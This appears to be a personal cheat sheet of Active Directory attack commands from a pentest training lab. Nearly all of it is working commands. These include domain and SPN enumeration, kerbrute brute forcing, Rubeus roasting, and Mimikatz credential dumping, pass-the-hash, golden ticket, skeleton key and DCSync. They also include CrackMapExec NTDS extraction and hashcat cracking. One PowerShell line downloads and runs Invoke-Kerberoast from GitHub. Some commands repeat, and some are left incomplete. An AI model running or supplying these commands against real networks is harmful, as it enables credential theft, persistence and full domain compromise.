AD

net user

whoami

whoami /groups

net user /domain

net user [username] /domain

Get-ADUser -filter {name -like "sys.varonis.sql*"} -Properties *

$ldapFilter = "(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.PageSize = 1000
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
$results = $search.FindAll()
$Results = foreach ($result in $results) {
    $result_entry = $result.GetDirectoryEntry()
    $result_entry | Select-Object @{ Name = "Username"; Expression = { $_.sAMAccountName }}, @{ Name = "SPN"; Expression = { $_.servicePrincipalName | Select-Object -First 1 }}
}
$Results

# Identify the domain
net view /domain

# List of users in the domain
net user /domain

# List of groups on the domain
net group /domain

# Display list of file and printer shares on a specified computer
net view \\computerName

# Display shares including hidden shares on a remote computer
net view \\computername /all

# List of shares on a remote Netware computer
net view /network:nw

# List all available servers on a specified domain
net view /domain:[domain name]

# Find the domain name of the current system
systeminfo | findstr /B /C:"Domain"

# Find logged in user's domain
echo %userdomain%

# Find domain name using WMIC
wmic computersystem get domain

./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local /usr/share/wordlists/Active-Directory-Wordlists/User.txt

./kerbrute bruteuser --dc cpent.localnet -d cpent.localnet /usr/share/wordlists/Active-Directory-Wordlists/Pass.txt administrator

Get-aduser -filter { UserAccountControl -band 4194304 } | foreach {
    $User = $_
    Get-ADPrincipalGroupMembership -Identity $User | Select-Object @{ Name = "User"; Expression = { $User.SAMAccountName }}, DistinguishedName, SAMAccountName
} | Export-Csv test.csv

Rubeus.exe asreproast

Rubeus.exe harvest /interval:30

Rubeus.exe brute /password:Password1 /noticket

Rubeus.exe kerberoast

hashcat -m 18200 hash.txt Pass.txt

privilege::debug

token::elevate

lsadump::sam

sekurlsa::pth /user:administrator /domain:. /ntlm:b8699d84246004a8d6f

lsa_dump_sam

sekurlsa::tickets /export

kerberos::ptt <ticket>

klist

lsadump::lsa /inject /name:krbtgt

use auxiliary/gather/ldap_query
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNET

use auxiliary/gather/ldap_query
set action ENUM_USER_SPNS_KERBEROAST
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNET

kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500

misc::cmd

misc::skeleton

lsadump::dcsync /domain:cpent.local /all /csv

impacket-GetUserSPNs -dc-ip 172.25.170.80 ECC.LOCALNET/administrator

impacket-GetUserSPNs -dc-ip 10.10.187.117 CONTROLLER.local/administrator -request

crackmapexec smb -u administrator -p 'Pa$$w0rd123' -d ECC.LOCALNET 172.25.170.80 --lsa

crackmapexec smb -u username -p 'password' -d domaincontroller IPDomainController/ --ntds

crackmapexec smb -u username -p 'password' -d domaincontroller IPDomainController/Anotherdomainjoinedserver --sam

crackmapexec smb -u administrator -p 'Pa$$w0rd123' -d ECC.LOCALNET 172.25.170.80 --kerberoasting output.txt

hashcat -m 1000 -a 3 hash.txt

hashcat -m 13100 kerberoshash -a 0 -o results.txt /usr/share/wordlists/Active-Directory-Wordlists/Pass.txt

hashcat -m 18200 hash.txt Pass.txt

john --format=nt hash.txt

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"

nbtstat -a IP

nmap -p 445,138,139 --script=*smb*

# Ensure the command outputs [output '20' OK] to check for administrator privileges
privilege::debug

# Elevate privileges to system level
Token::elevate

# Dump the NTLM hashes from Mimikatz in Windows
lsadump::sam

# Pass the NTLM hash to gain access as the administrator
sekurlsa::pth /user:administrator /domain:. /ntlm:b8699d84246004a8d6f

# Use PsExec to execute commands on a remote machine within the same internal network
PsExec.exe \\172.25.170.110 cmd.exe

# Dump all hashes from Metasploit and crack them with Hashcat if it's an NTLM hash
lsa_dump_sam

# Export all Kerberos tickets into the current directory
sekurlsa::tickets /export

# Perform a "pass the ticket" attack using the harvested ticket
kerberos::ptt 

# Verify the successful impersonation of the ticket by listing cached tickets
klist 

# Dump the hash of the krbtgt service account
lsadump::lsa /inject /name:krbtgt 

# Dump the hash of a specific service account (SQLService)
lsadump::lsa /inject /name:SQLService 

# Request a silver ticket for a specific resource by changing the account name
lsadump::lsa /inject /name:Administrator 

# Generate a golden ticket for domain access
Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500

# Open a new elevated command prompt with the given ticket
misc::cmd 

# Backdoor access through Mimikatz by implanting a skeleton key into a domain controller
misc::skeleton 

# Example commands to access shares without needing the administrator's password
net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
dir \\Desktop-1\c$ /user:Machine1 mimikatz

# Extract hashes stored in NTDS.DIT and output as CSV
lsadump::dcsync /domain:cpent.local /all /csv 

# Load the Kiwi module for Kerberos
load kiwi 

# Request a Kerberos ticket for SPN found by the LDAP query module
kiwi_cmd kerberos::ask /target:https/TSTWLPT1000000 

# List current session tickets
kerberos_ticket_list 

# Export service tickets using Kiwi extension
kiwi_cmd kerberos::list /export 

# Inject a new ticket into memory for authentication
kiwi_cmd kerberos::ptt Administrator.kirbi 

# Convert the .kirbi hash to a John or Hashcat compatible format
python3 kirbi2john.py ~/1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi 

# Crack the encrypted password using hashcat with the specified mode
hashcat -m 13100 --force -a 0 hash.txt wordlist.txt

# AD Reconnaissance commands
net user          # Returns users on the machine
whoami            # Displays the currently logged-in user
whoami /groups    # Shows groups for the current user
net user /domain  # Shows users from all groups in the domain

# Get properties of a specific user
Get-ADUser -filter {name -like "sys.varonis.sql*"} -Properties *

# Build an LDAP filter to find users with registered SPN values
$ldapFilter = "(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry 
$search = New-Object System.DirectoryServices.DirectorySearcher 
$search.SearchRoot = $domain 
$search.PageSize = 1000 
$search.Filter = $ldapFilter 
$search.SearchScope = "Subtree" 
$results = $search.FindAll() 

# Display SPN values from returned objects
$Results = foreach ($result in $results) { 
    $result_entry = $result.GetDirectoryEntry() 
    $result_entry | Select-Object @{ Name = "Username"; Expression = { $_.sAMAccountName } }, @{ Name = "SPN"; Expression = { $_.servicePrincipalName | Select-Object -First 1 } } 
} 
$Results

# Domain discovery commands
net view /domain                    # Identify the domain
net user /domain                    # List users on the domain
net group /domain                   # List groups on the domain
net view \\computerName             # Display shares on a remote computer
net view \\server.domain\share$     # Show shares including hidden shares
net view /network:nw                # List shares on a Netware computer
net view /domain:[domain name]      # List all servers on a domain
systeminfo | findstr /B /C:"Domain" # Find the domain name
echo %userdomain%                   # Display logged-in user's domain
Wmic computersystem get domain      # Find domain name with WMIC

# Use Metasploit's LDAP query auxiliary module
use auxiliary/gather/ldap_query 
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNET 

# Get SPNs from Metasploit
use auxiliary/gather/ldap_query 
set action ENUM_USER_SPNS_KERBEROAST 
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNET 

# Nbtstat command to check NetBIOS statistics
nbtstat -a IP 

# Nmap command for SMB services
nmap -p 445,138,139 --script=*smb*

# Kerberoasting from Linux
impacket-GetUserSPNs -dc-ip 172.25.170.80 ECC.LOCALNET/administrator   # Get TGT from domain
impacket-GetUserSPNs WS2012-DC/cpent:Pa$$w0rd123 -dc-ip 172.25.170.110   # Request TGS ticket
impacket-GetUserSPNs -dc-ip 10.10.187.117 CONTROLLER.local/administrator -request 

# Crack SPN with hashcat after Kerberoasting
hashcat -m    # Adjust  and files as needed

# Kerberoasting from Windows with options available
Getusersspns.py htb.local/asmith:passw0rd  # Get SPNs with cracked user
Getusersspns.py htb.local/asmith:password -request  # Request a TGT

# CrackMapExec commands for various tasks
crackmapexec smb -u username -p 'password' -d  --lsa # Extract LSA hashes
crackmapexec smb -u administrator -p 'Pa$$w0rd123' -d ECC.LOCALNET 172.25.170.80 --lsa # Example command

# Powershell to bypass execution policy
powershell -ep bypass